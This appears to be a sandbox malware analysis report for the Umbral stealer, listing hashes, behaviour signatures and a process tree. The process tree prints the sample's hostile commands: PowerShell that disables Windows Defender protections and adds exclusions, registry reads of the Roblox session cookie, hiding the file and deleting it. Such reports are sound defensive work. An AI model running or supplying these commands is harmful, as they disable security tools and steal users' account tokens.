Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Umbral.exe

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    30s
  • max time network
    17s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    28/01/2025, 02:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Umbral.exe

  • Size

    230KB

  • MD5

    38b42800e087dcee9961a8e80318d6f2

  • SHA1

    36893cfd322a6021d8048ca6971fc094de6a9f7c

  • SHA256

    44a1693b64e6cb0054ab2d7188af6c9f213ba2a65cf278b6f3857ab462cf30a2

  • SHA512

    5c1d1065e8d076abeabe473f184e7561a2bc9b8b1486b3bff7540e736aa700a93a4879f97f70e176044089ca6eb0462725f26cdd3cb78190de62a62252cb6039

  • SSDEEP

    6144:uloZM+rIkd8g+EtXHkv/iD4K8Nqbw2xpapPyAxVkK6b8e1myui:4oZtL+EP83Nqbw2xpapPyAxVkdXD

Score
10/10
umbraldiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1816
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:4960
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:3988
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:3148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:64
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3744
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:2592
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1836
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious behavior: EnumeratesProcesses
      PID:3408
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:756
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2808

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    948B

    MD5

    f8e5f7624846b8c5a971591692717cf4

    SHA1

    7505e50af2662ed414e89cec741408f905fa1725

    SHA256

    db7bede3d8817b35e77b01069a0995c55c7f538cb299281eb3d8afe5f5b47611

    SHA512

    bf91013c305fb8281806a9e530c764e0915850675453323b92f217c35fe4b30daf835a14f0db9106669637db59b649ae64fee2bd07dbe3f93ee54cf42ae2cab4

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    494de073067224860ddfa87f20c1fcd5

    SHA1

    139fe0d6cc741fdbb891b5e0df6e236fcdfdd7de

    SHA256

    5b67e54cbb8566db2c781ed86c2e026bef8e1c6e5b454c42872ffba7782a9579

    SHA512

    2457bb775ad7ce2b62b35f5cddfab1c1e1b16dcba83e38e7b5fb2e205048ffc5d220a29a9b0cfe218800d46fc3888480a0822877cf392aeadcf9287b784a390a

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    23177316e5ab500ee9f5e650f688b47e

    SHA1

    d5ba3def42a52e8caa9f92ca7b18d4b08150257f

    SHA256

    af6d0dd4d2a2721405f6b8fcc6acb9fcc99db3311ca4fe6c413348376ea35554

    SHA512

    074f1307c7251546abee94b5645af4a5a51e39eeb4acf47bfdeba89bfe7ba7967bd9fdb4ea611197344f06551409bdcca68d3b58713a93b9c93a181b1b420de6

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ucmkoxky.2rl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1156-59-0x000001E67F940000-0x000001E67F952000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1156-0-0x00007FFE43DA3000-0x00007FFE43DA5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1156-58-0x000001E665620000-0x000001E66562A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1156-90-0x000001E600020000-0x000001E6001C7000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1156-91-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1156-32-0x000001E67F8C0000-0x000001E67F936000-memory.dmp

    Filesize

    472KB

    Download

  • memory/1156-33-0x000001E666F20000-0x000001E666F70000-memory.dmp

    Filesize

    320KB

    Download

  • memory/1156-34-0x000001E665630000-0x000001E66564E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1156-2-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1156-1-0x000001E665170000-0x000001E6651B0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2808-74-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-84-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-79-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-73-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-75-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-80-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-85-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-81-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-83-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2808-82-0x0000014661200000-0x0000014661201000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3612-18-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3612-5-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3612-15-0x000001FAF3E90000-0x000001FAF3EB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3612-4-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3612-3-0x00007FFE43DA0000-0x00007FFE44862000-memory.dmp

    Filesize

    10.8MB

    Download